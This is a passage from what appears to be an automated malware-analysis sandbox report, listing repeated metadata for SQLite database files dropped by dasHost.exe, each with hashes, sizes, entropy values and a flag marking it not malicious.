                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
